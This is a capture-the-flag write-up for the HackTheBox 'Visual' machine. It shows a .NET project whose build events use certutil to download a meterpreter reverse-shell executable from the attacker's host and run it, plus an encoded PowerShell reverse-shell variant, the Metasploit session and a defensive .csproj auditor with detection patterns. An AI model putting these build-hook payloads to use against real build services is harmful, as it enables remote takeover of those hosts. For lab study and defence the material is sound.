
HackTheBox - Visual

This box starts off with a web application that offers dotnet building services.

[Image: homepage]

Reconnaissance

Nothing special in the nmap scan.

# Nmap 7.93 scan initiated Wed Oct  4 17:07:47 2023 as: nmap -sC -sV -oN nmap_result 10.10.11.234
Nmap scan report for 10.10.11.234
Host is up (0.024s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
|_http-title: Visual - Revolutionizing Visual Studio Builds

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct  4 17:08:12 2023 -- 1 IP address (1 host up) scanned in 24.60 seconds

The application accepts the URL of a .git repository and builds the .NET project it contains.

Foothold

We can create a .NET project that uses the PreBuild and PostBuild events to execute arbitrary commands, and use that to run a reverse shell.

Set up a .NET project to build

$ mkdir exploit                                
$ cd exploit
$ dotnet new sln -o Repo
The template "Solution File" was created successfully.
$ cd Repo   
$ dotnet new console -o Repo.ConsoleApp --framework net6.0 --force
The template "Console App" was created successfully.
$ dotnet sln Repo.sln add Repo.ConsoleApp/Repo.ConsoleApp.csproj
Project `Repo.ConsoleApp/Repo.ConsoleApp.csproj` added to the solution.

We now have a default .NET project that we can use to perform RCE on the server.

Create Reverse Shell

MSFVenom shell

We use msfvenom to create the shell we will drop and execute on the server, and spin up a Python HTTP server on port 8000 to serve the exe.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.109 LPORT=1234 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
$ python3 -m http.server 8000                                                                 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

We can now edit our .csproj file so that the build events download and execute the exe. We use certutil in the PreBuild event to download the shell to the %temp% directory, and execute it in the PostBuild event.

$ pwd                                                         
../visual/exploit/Repo/Repo.ConsoleApp
$ vi Repo.ConsoleApp.csproj 
<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <!-- Runs before compilation: fetch the payload onto the build host -->
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="certutil -urlcache -f http://10.10.14.110:8000/shell.exe %temp%/shell.exe" />
  </Target>

  <!-- Runs after compilation: launch the downloaded payload -->
  <Target Name="PostBuild" AfterTargets="PostBuildEvent">
    <Exec Command="start %temp%/shell.exe" />
  </Target>

</Project>

Powershell shell

This is an alternative option I didn’t use as it wasn’t stable for me, but I heard others had success with this method.

It essentially generates a Base64-encoded PowerShell reverse shell command and executes it in the PreBuild event. In this example, we use a Python script found on GitHub (mkpsrevshell.py) to generate it.

$ python3 mkpsrevshell.py 10.10.14.110 1234
powershell -e JABjAG**BASE64_OUTPUT**oACkA
$ vi Repo.ConsoleApp.csproj 
<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <!-- Runs before compilation: the encoded command opens the reverse shell -->
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell -e JABjAG**BASE64_OUTPUT**oACkA" />
  </Target>

</Project>
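Both variants above rely on the same weakness in a build service: MSBuild runs whatever shell command a project file hooks into its build events. As an added defender-side example (not code from the original write-up), the script below parses a .csproj the way a build service could before handing it to MSBuild, lists every build-time command (`<Exec>` tasks inside `<Target>` elements and the legacy `PreBuildEvent`/`PostBuildEvent` properties) and explains why each one is suspicious. The sample project texts, the hostname `attacker.example` and the pattern list are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: an SDK-style .csproj carrying the two kinds of hook seen
# above. The host name is a placeholder, not a real address.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="certutil -urlcache -f http://attacker.example/shell.exe %temp%/shell.exe" />
  </Target>
  <Target Name="PostBuild" AfterTargets="PostBuildEvent">
    <Exec Command="start %temp%/shell.exe" />
  </Target>
  <PropertyGroup>
    <PreBuildEvent>powershell -e JABjAG...</PreBuildEvent>
  </PropertyGroup>
</Project>
"""

# Constructed sample: a project whose only build-time command is harmless.
CLEAN_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
  <Target Name="Stamp" AfterTargets="Build">
    <Exec Command="echo build finished" />
  </Target>
</Project>
"""

# Indicators of a download-and-run or encoded-command stage (constructed list,
# extend it for your environment).
SUSPICIOUS = [
    (re.compile(r"\bcertutil\b.*-urlcache", re.I), "certutil download"),
    (re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\b", re.I), "encoded powershell"),
    (re.compile(r"\b(curl|wget|bitsadmin|Invoke-WebRequest|iwr)\b", re.I), "network download tool"),
    (re.compile(r"\bstart\b.*%temp%", re.I), "launch from %temp%"),
    (re.compile(r"https?://", re.I), "embedded URL"),
]


def _local(tag):
    """Strip an XML namespace prefix; older (non-SDK) MSBuild projects carry one."""
    return tag.rsplit("}", 1)[-1]


def build_commands(csproj_text):
    """Return (location, command) for every shell command MSBuild would run:
    <Exec Command="..."> inside any <Target>, plus the legacy
    <PreBuildEvent>/<PostBuildEvent> properties."""
    root = ET.fromstring(csproj_text)
    found = []
    for target in root.iter():
        if _local(target.tag) != "Target":
            continue
        name = target.get("Name", "?")
        for task in target.iter():
            if _local(task.tag) == "Exec" and task.get("Command"):
                found.append((f"Target {name}", task.get("Command")))
    for prop in root.iter():
        if _local(prop.tag) in ("PreBuildEvent", "PostBuildEvent") and (prop.text or "").strip():
            found.append((_local(prop.tag), prop.text.strip()))
    return found


def audit(csproj_text):
    """Return (location, command, reasons) for each build-time command that
    matches at least one suspicious pattern. An empty list only means nothing
    matched; a service that builds untrusted repositories should refuse any
    build-time command at all rather than rely on this list."""
    findings = []
    for location, command in build_commands(csproj_text):
        reasons = [label for pattern, label in SUSPICIOUS if pattern.search(command)]
        if reasons:
            findings.append((location, command, reasons))
    return findings


if __name__ == "__main__":
    for location, command, reasons in audit(SAMPLE_CSPROJ):
        print(f"{location}: {command!r} -> {', '.join(reasons)}")
    print("clean project findings:", audit(CLEAN_CSPROJ))
```

The pattern list exists to explain a finding to a reviewer, not to decide trust: `build_commands` returning anything at all is the signal a build service should act on, since a project file submitted by a stranger has no legitimate reason to run shell commands on the build host. The remaining mitigations are on the host side (build inside a throwaway sandbox with no outbound network and with the build account's privileges minimised), which this script does not replace.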

Set up a local Git server

As this box has no internet access, we need to set up a local Git server, either by serving a Git repository over HTTP or by running Gitea.

$ cd ctf/htb/visual     
$ ls
exploit  failed  mkpsrevshell.py  nmap_result  repo-http
$ cd exploit       
$ cd Repo       
$ ls
Repo.ConsoleApp  Repo.sln  shell.exe
$ git init
Initialized empty Git repository in /home/kali/ctf/htb/visual/exploit/Repo/.git/
$ git add . 
$ git commit -m "Repo"                   
[master (root-commit) 3d6d454] Repo
 9 files changed, 225 insertions(+)
 create mode 100644 Repo.ConsoleApp/Program.cs
 create mode 100644 Repo.ConsoleApp/Repo.ConsoleApp.csproj
 create mode 100644 Repo.ConsoleApp/obj/Repo.ConsoleApp.csproj.nuget.dgspec.json
 create mode 100644 Repo.ConsoleApp/obj/Repo.ConsoleApp.csproj.nuget.g.props
 create mode 100644 Repo.ConsoleApp/obj/Repo.ConsoleApp.csproj.nuget.g.targets
 create mode 100644 Repo.ConsoleApp/obj/project.assets.json
 create mode 100644 Repo.ConsoleApp/obj/project.nuget.cache
 create mode 100644 Repo.sln
 create mode 100644 shell.exe
$ cd .git
$ git --bare update-server-info
$ python3 -m http.server 80                                         
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Running the Metasploit listener

We set up our Metasploit listener.

$ msfconsole            
msf6 > use mullti/handler
[-] No results from search
[-] Failed to load module: mullti/handler
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 1234
lport => 1234
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > run

Now that everything is set up, we submit the URL of our .git folder (served on port 80) to the application and turn on our listener.

Once the build starts, requests begin coming in to our servers:

Port 80 (.git)

$ python3 -m http.server 80                                         
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /info/refs?service=git-upload-pack HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /HEAD HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/3d/6d454053bf65be73f3f17f2e2ffb4a4ef319be HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/c3/4d11642c16c3983f09741d38ad57ee6f04f106 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/b9/7f857d23fd696fefa3ff9eef4a63edcf08d9a6 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/7d/41a2ac5addb46f980ebb809e2a3ea03d9e6d68 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/47/cd2151e2328faf0ad5c24a862bbae197e035c4 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/61/59ea4ea5dc0c1c0ef437b2c8da4be4203d0bef HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/2c/31619edaa2b2f8de1a35581dbcfdc750b66611 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/83/fa4f4d5fd1f545f64172b044a07814db23104f HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/a1/ecbc14179bd62ea673d595b2a721ef088a2f89 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/48/4c1427d2414ef36a2c10b1dfb7a8997a0dceb6 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/3d/c06ef3cc4057524bf5d2cd49936dff789cebe8 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/3a/890c6e312332a3523ce5a21525e117c98d4289 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/d5/44b9dae0e0cd28963f7ba3e52bba7dcaef26b9 HTTP/1.1" 200 -

Port 8000 (shell.exe)

$ python3 -m http.server 8000                                                                 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.234 - - [05/Oct/2023 17:03:03] "GET /shell.exe HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:03:03] "GET /shell.exe HTTP/1.1" 200 -

Metasploit Listener

[*] Started reverse TCP handler on 10.10.14.109:1234 
[*] Sending stage (200774 bytes) to 10.10.11.234
[*] Meterpreter session 1 opened (10.10.14.109:1234 -> 10.10.11.234:49742) at 2023-10-05 17:03:09 +0200

meterpreter > shell
Process 4312 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\Temp\062daf416765efc93f6370dc736374\Repo.ConsoleApp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 82EF-5600

 Directory of C:\Windows\Temp\062daf416765efc93f6370dc736374\Repo.ConsoleApp

10/05/2023  08:02 AM    <DIR>          .
10/05/2023  08:02 AM    <DIR>          ..
10/05/2023  08:02 AM    <DIR>          obj
10/05/2023  08:02 AM               105 Program.cs
10/05/2023  08:02 AM               515 Repo.ConsoleApp.csproj
               2 File(s)            620 bytes
               3 Dir(s)   9,043,091,456 bytes free

C:\Windows\Temp\062daf416765efc93f6370dc736374\Repo.ConsoleApp>cd C:\Users\
cd C:\Users\

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 82EF-5600

 Directory of C:\Users

06/10/2023  10:59 AM    <DIR>          .
06/10/2023  10:59 AM    <DIR>          ..
09/12/2023  02:02 AM    <DIR>          Administrator
09/12/2023  02:27 AM    <DIR>          enox
10/05/2023  07:55 AM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)   9,043,767,296 bytes free

C:\Users>cd enox
cd enox

C:\Users\enox>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 82EF-5600

 Directory of C:\Users\enox

09/12/2023  02:27 AM    <DIR>          .
09/12/2023  02:27 AM    <DIR>          ..
06/10/2023  01:10 PM    <DIR>          Desktop
06/10/2023  11:00 AM    <DIR>          Documents
09/15/2018  12:19 AM    <DIR>          Downloads
09/15/2018  12:19 AM    <DIR>          Favorites
09/15/2018  12:19 AM    <DIR>          Links
09/15/2018  12:19 AM    <DIR>          Music
09/15/2018  12:19 AM    <DIR>          Pictures
09/15/2018  12:19 AM    <DIR>          Saved Games
09/15/2018  12:19 AM    <DIR>          Videos
               0 File(s)              0 bytes
              11 Dir(s)   9,043,767,296 bytes free

C:\Users\enox>cd Desktop
cd Desktop

C:\Users\enox\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 82EF-5600

 Directory of C:\Users\enox\Desktop

06/10/2023  01:10 PM    <DIR>          .
06/10/2023  01:10 PM    <DIR>          ..
10/05/2023  07:51 AM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   9,042,903,040 bytes free

C:\Users\enox\Desktop>type user.txt
type user.txt
298c3**REDACTED**a15e6
This post is licensed under CC BY 4.0 by the author.